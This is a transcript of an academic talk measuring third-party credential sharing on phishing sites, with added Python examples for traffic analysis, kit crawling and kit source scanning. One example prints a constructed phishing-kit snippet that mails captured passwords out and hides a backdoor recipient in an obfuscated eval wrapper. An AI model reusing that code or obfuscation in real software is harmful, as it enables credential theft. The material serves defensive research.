Slide 1: What Happens After You Leak Your Password: Understanding Credential Sharing on Phishing Sites
Peng Peng, Chao Xu, Luke Quinn, Hang Hu, Bimal Viswanath, Gang Wang
Department of Computer Science, Virginia Tech; pengp17@vt.edu
Slide 2: Growing Prevalence of Phishing
Slide 3: Growing Prevalence of Spear Phishing
Slide 4: Phishing Workflow
Standard phishing process: lure users to visit a phishing website and leak sensitive information (e.g., a password); the phishing server then sends the sensitive information to the attacker.
Figure: Victim -> Phishing Page -> Phishing Server -> Attacker
Most existing work focuses on the front-end:
- Phishing web page (text, JavaScript, images)
- Phishing URLs
- Security indicators
Recent studies start to look at the back-end:
- Phishing kit analysis
- Compromised servers used for phishing
There is a lack of empirical understanding of the end-to-end information flow.
Slide 5: This Study: End-to-End Analysis of Credential Sharing
- Empirically understand the end-to-end credential collection process
- Characterize 3rd-party sharing of collected credentials
Figure: Victim -> Phishing Page -> Phishing Server -> 1st-party Collector -> Post-phishing exploitation. Client-side sharing (from the phishing page) and server-side sharing (from the phishing server) also deliver the credentials to one or more 3rd-party Collectors.
Slide 6: Outline
- Background
- Client-side sharing: auto-login tool to feed a password; network traffic analysis
- Server-side analysis
- Post-phishing exploitation
Figure: Victim -> Phish Page -> Server -> 1st-party, 3rd-party
Slide 7: Data Collection
Developed a browser-based measurement tool using Selenium: given a phishing page, submit a fake password, then detect the traffic flows that send the fake password to remote hosts.
Pipeline:
- 4 phishing blacklists, Aug. 18 – Jan. 19: 179,000+ phish URLs
- Identify live pages
- Detect login form (OCR + HTML + JS analysis)
- Auto-fill a fake username and password
- Activate login (handle 2-step login)
- Auto "log-in" + traffic recording
- Final dataset: 41,986 phishing sites over 5 months
Slide 8: Basic Observations
HTTPS or HTTP? 16,000+ (33%) phishing sites are hosted under HTTPS, deceiving users with the green padlock.
Target brands: most sites target financial or IT companies.
Slide 9: Compromised Domains Hosting Phishing Pages
- iccps.acm.org/admin/*** : fake FedEx page under the ICCPS conference site
- conferences.sigcomm.org/css/*** : fake French tax agency web page under the SIGCOMM conference site
- councillorportal.ashfield.nsw.gov.au/Service/*** : fake PayPal web page under an Australian government website
Slide 10: Client-Side Third-Party Credential Collectors
Figure: web page served from phishing.com; a request carrying the password back to phishing.com is a 1st-party collector, a request carrying it to others.com is a 3rd-party collector.
- Auto-login with a unique, random password
- Network flows that contain the plaintext or hashed password (31 hash/encode functions considered)
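The detection step behind slides 7 and 10, as an added example that is not the authors' tool: a unique random password is submitted, every captured request is searched for it in plaintext or in encoded/hashed form, and the receiving host is classified as 1st-party or 3rd-party by comparing its registered domain with the phishing page's. The flows, host names and password below are constructed; the encoding list is a small subset of the 31 functions the talk mentions, and the registered-domain helper is a deliberate simplification (last two labels) rather than a Public Suffix List lookup.

```python
"""Added example: find which hosts a submitted canary password was sent to."""
import base64
import hashlib
import secrets
from urllib.parse import quote, urlsplit


def make_canary(nbytes: int = 12) -> str:
    """Unique random password: any later appearance in traffic is attributable."""
    return secrets.token_urlsafe(nbytes)


def password_forms(password: str) -> dict:
    """Encoded/hashed representations a phishing page might transmit
    (subset of the 31 functions considered in the talk)."""
    raw = password.encode()
    forms = {
        "plain": password,
        "urlencoded": quote(password, safe=""),
        "base64": base64.b64encode(raw).decode(),
    }
    for algo in ("md5", "sha1", "sha256"):
        forms[algo] = hashlib.new(algo, raw).hexdigest()
    return forms


def registered_domain(host: str) -> str:
    """Crude eTLD+1 (last two labels): a simplifying assumption for this example.
    A real tool should consult the Public Suffix List (this mislabels co.uk)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def find_collectors(page_url: str, password: str, flows: list) -> list:
    """Return (host, encoding, party) for each captured flow carrying the password.

    A flow is {"url": ..., "body": ...}; both the URL (query string) and the
    body are searched, since collectors receive credentials via GET and POST.
    """
    page_domain = registered_domain(urlsplit(page_url).hostname)
    forms = password_forms(password)
    hits = []
    for flow in flows:
        haystack = flow["url"] + "\n" + flow.get("body", "")
        for name, value in forms.items():
            if value in haystack:
                host = urlsplit(flow["url"]).hostname
                party = "1st-party" if registered_domain(host) == page_domain else "3rd-party"
                hits.append((host, name, party))
                break  # report the first matching form per flow
    return hits


# Constructed sample: the phishing page POSTs the password to its own server
# and also leaks its MD5 to collector.example in an image-style GET.
SAMPLE_PAGE = "https://phishing.example/login.php"
SAMPLE_PASSWORD = "pw!9f3c1a7b"          # stands in for make_canary() output
SAMPLE_FLOWS = [
    {"url": "https://phishing.example/post.php",
     "body": "user=victim%40example.com&pass=" + quote(SAMPLE_PASSWORD, safe="")},
    {"url": "https://api.phishing.example/track.gif", "body": ""},
    {"url": "https://collector.example/c.php?h="
            + hashlib.md5(SAMPLE_PASSWORD.encode()).hexdigest(), "body": ""},
    {"url": "https://cdn.example/jquery.min.js", "body": ""},
]

if __name__ == "__main__":
    for host, enc, party in find_collectors(SAMPLE_PAGE, SAMPLE_PASSWORD, SAMPLE_FLOWS):
        print(f"{party}: {host} received the password as {enc}")
```

Matching on encoded and hashed forms matters because a page that hashes the password client-side before posting it would otherwise look clean; the first flow above is only caught through its URL-encoded form and the third only through its MD5.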
Slide 11: Findings on Third-Party Credential Sharing
Prevalence: about 5% (2,019) of the phishing URLs in our dataset have third-party collectors.
Are they flagged? 30% of collector domains have a "poor" reputation according to Cisco Talos IP and Domain Reputation; 80% of collector URLs are labeled "Phishing" by VirusTotal; but most of them are still alive.
Where are they? The majority of collectors (56%) are hosted in a different country from the phishing domain.
Slide 12: Examples: Client-Side 3rd-Party Collectors
Case study:
Domain        # Phish URLs  Description
w32.info      731           Once hosted many phishing kits for downloading
ip-api.org    89            Might be compromised
serveirc.com  57            Dynamic DNS service
Slide 13: Outline
- Background
- Client-side sharing
- Server-side analysis: phishing kit collection; sandbox analysis
- Post-phishing exploitation
Figure: Victim -> Phish Page -> Server -> 1st-party, 3rd-party
Slide 14: Data Collection on Phishing Kits
Phishing kits: software kits used to deploy and operate phishing sites.
Greedy method to collect phishing kits from phishing servers/URLs:
- Search for "open" directories (directory listing enabled)
- Check every path segment in the phishing URLs
- Download compressed files (e.g., .zip)
- Try known phishing kit names against all phishing URLs
2,064 phishing kits downloaded
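The greedy collection method above, as an added example rather than the authors' crawler: from one phishing URL it derives every ancestor directory (to test for an open listing), each path segment as an archive name next to its directory, and a list of known kit file names tried in every directory. Fetching is injected as a callable so the logic runs offline; the fake site, the phishing URL and the KNOWN_KIT_NAMES list are all constructed stand-ins (the talk's real list of kit names is not on the page).

```python
"""Added example: enumerate and probe candidate phishing-kit download locations."""
from urllib.parse import urlsplit, urlunsplit

ARCHIVE_SUFFIXES = (".zip", ".rar", ".tar.gz")
# Hypothetical names standing in for the talk's list of known kit file names.
KNOWN_KIT_NAMES = ("kit.zip", "paypal.zip")


def ancestor_dirs(url: str) -> list:
    """Every directory above the phishing page, root first, each ending in '/'."""
    parts = urlsplit(url)
    segs = [s for s in parts.path.split("/") if s]
    if segs and not parts.path.endswith("/"):
        segs = segs[:-1]                       # last segment is a file (e.g. login.php)
    return [urlunsplit((parts.scheme, parts.netloc,
                        "/" + "".join(s + "/" for s in segs[:i]), "", ""))
            for i in range(len(segs) + 1)]


def archive_candidates(url: str, known_names=KNOWN_KIT_NAMES) -> list:
    """URLs to probe: each path segment as an archive beside its directory
    (kits are commonly unpacked next to the uploaded .zip), plus the known
    kit names in every directory."""
    dirs = ancestor_dirs(url)
    segs = [d.rstrip("/").rsplit("/", 1)[-1] for d in dirs[1:]]
    cands = [dirs[i] + seg + suf
             for i, seg in enumerate(segs) for suf in ARCHIVE_SUFFIXES]
    cands += [d + name for d in dirs for name in known_names]
    return cands


def harvest(url: str, fetch, known_names=KNOWN_KIT_NAMES) -> dict:
    """fetch(url) -> (status, body bytes).  Reports open directory listings and
    archives that really are zip files (PK header) rather than an HTML error page
    returned with status 200."""
    found = {"open_dirs": [], "archives": []}
    for d in ancestor_dirs(url):
        status, body = fetch(d)
        if status == 200 and b"Index of /" in body:
            found["open_dirs"].append(d)
    for cand in archive_candidates(url, known_names):
        status, body = fetch(cand)
        if status == 200 and body.startswith(b"PK\x03\x04"):
            found["archives"].append(cand)
    return found


# Constructed fake site: the kit was uploaded as secure-login.zip and unpacked
# beside it; /media/ has directory listing enabled, the kit directory does not.
FAKE_SITE = {
    "https://compromised.example/": (200, b"<html>welcome</html>"),
    "https://compromised.example/media/": (200, b"<title>Index of /media</title>"),
    "https://compromised.example/media/secure-login/": (403, b"Forbidden"),
    "https://compromised.example/media/secure-login.zip": (200, b"PK\x03\x04...kit bytes..."),
}
PHISH_URL = "https://compromised.example/media/secure-login/index.php"


def fake_fetch(url):
    """Offline stand-in for an HTTP GET against the constructed site."""
    return FAKE_SITE.get(url, (404, b""))


if __name__ == "__main__":
    print(harvest(PHISH_URL, fake_fetch))
```

Checking the zip magic bytes instead of trusting the status code is worth keeping in a real crawler: compromised hosts frequently answer every unknown path with a 200 page, which would otherwise be saved as a "kit".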
Slide 15: Server-Side 3rd-Party Collectors
Phishing kits send the collected credentials to various email addresses:
- First-party@gmail.com: the phisher who deployed the phishing website
- Third-party@gmail.com: a backdoor hidden in the phishing kit
Static analysis (plaintext searching) finds 1st-party collectors; dynamic analysis [1] (running the kit in a sandbox) finds 3rd-party collectors.
[1] Cova et al., WOOT'08
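Why the slide pairs plaintext searching with a sandbox, shown as an added example (not the authors' analysis code): a plaintext scan of the kit's PHP recovers the address the deploying phisher typed in, while a backdoor author hides the second recipient inside an eval(gzinflate(base64_decode(...))) wrapper that a naive grep never sees. The scanner below peels such wrappers statically; running the kit and hooking mail() is the more general approach. The kit source and both addresses are constructed.

```python
"""Added example: recover plaintext and hidden collector addresses from kit source."""
import base64
import re
import zlib

EMAIL_RE = re.compile(rb"[\w.+-]+@[\w-]+\.[\w.-]+")
B64_RE = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")   # long base64-looking literals


def _b64(token: bytes) -> bytes:
    try:
        return base64.b64decode(token, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return b""


def decode_layers(blob: bytes, depth: int = 3) -> list:
    """Collect nested payloads: every base64 literal and, for each, a raw-deflate
    (PHP gzinflate) decompression attempt; recursion is bounded by depth."""
    out = []

    def walk(data, level):
        if level > depth:
            return
        for token in B64_RE.findall(data):
            dec = _b64(token)
            if not dec:
                continue
            out.append(dec)
            walk(dec, level + 1)
            try:
                inflated = zlib.decompress(dec, -15)   # wbits=-15 -> raw deflate
            except zlib.error:
                continue
            out.append(inflated)
            walk(inflated, level + 1)

    walk(blob, 0)
    return out


def scan_kit_source(source: bytes) -> dict:
    """Plaintext addresses (what a grep finds) versus addresses only visible
    after decoding wrappers (the hidden 3rd-party collector)."""
    plain = set(EMAIL_RE.findall(source))
    hidden = set()
    for payload in decode_layers(source):
        hidden.update(EMAIL_RE.findall(payload))
    hidden -= plain
    return {"plaintext": sorted(a.decode() for a in plain),
            "hidden": sorted(a.decode() for a in hidden)}


def _php_pack(php: bytes) -> bytes:
    """Build the base64(gzdeflate(code)) blob a backdoored kit ships."""
    co = zlib.compressobj(wbits=-15)
    return base64.b64encode(co.compress(php) + co.flush())


# Constructed kit: one visible recipient, one packed into an eval() wrapper.
_HIDDEN = b'mail("backdoor@example.net", $subject, $message);'
SAMPLE_KIT = (
    b'<?php\n'
    b'$to = "phisher@example.com"; // address the deploying phisher typed in\n'
    b'$message = "User: ".$_POST["login"]." Pass: ".$_POST["pass"];\n'
    b'mail($to, $subject, $message);\n'
    b'eval(gzinflate(base64_decode("' + _php_pack(_HIDDEN) + b'")));\n'
)

if __name__ == "__main__":
    print(scan_kit_source(SAMPLE_KIT))
```

The static decoder only handles the wrapper shapes it knows about; a kit that builds the address from chr() calls or fetches it at runtime is exactly the case where executing the kit in a sandbox and observing outbound mail is needed.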
Slide 16: Prevalence of Third-Party Collectors
Figure: CDF (%) of the number of collectors per phishing kit
- 4.6% of kits have third-party collectors
- Most kits have a first-party collector
- One kit has 20 third-party collectors
Server-side third-party sharing exists but is not very prevalent.
Slide 17: Outline
- Background
- Client-side sharing
- Server-side analysis
- Post-phishing exploitation: create honey accounts and leak them to attackers; wait for attackers to exploit the email accounts
Figure: Victim -> Phish Page -> Server -> 1st-party, 3rd-party
Slide 18: Honey Email Accounts
Setup honey accounts: 100 Gmail and 50 ProtonMail accounts, populated with emails from the public Enron email dataset.
Account leakage: leaked the email address and password to different phishing sites (one account per site).
Account activity monitoring: Gmail "Last account activity" page; ProtonMail login logs.
7 accounts (out of 150) received logins within 50 days of leakage.
Slide 19: Case Study 1
Phishing site target: PayPal
Account type: Gmail
First login: 30 minutes after leakage
# login attempts: 9
# login IPs: 1
Attacker activity: registered AWS services and tried to pay bills
Slide 20: Case Study 2
Target brand: LinkedIn
Account type: ProtonMail
First login: 5 hours after leakage
# login attempts: 6
# login IPs: 4
# emails read: 2
Phishing site hosted in the US
- 5 hours: Attacker 1 logged in from Nigeria
- 3 days: Attacker 2 logged in from China
- 15 days: Attacker 1 checked in again
Credentials are widely shared in near real-time.
Slide 21: Conclusion
- Empirical measurement of credential sharing during phishing attacks: analysis of 179,000 phishing URLs (47,000 live phishing sites)
- Credential sharing happens at both the client and server side, exposing the credentials to more attackers, but the good news is that it is not yet very prevalent
- Third-party collectors are often flagged by blacklists, but they are rarely taken down
- Thoughts: leveraging third-party collectors for defense. Defenders (service providers) take over the detected 3rd-party collector emails/domains, keep them alive, and use them as a vantage point to monitor phishing activity, pinpoint future attacks and alert victims
Slide 22: Thank You
pengp17@vt.edu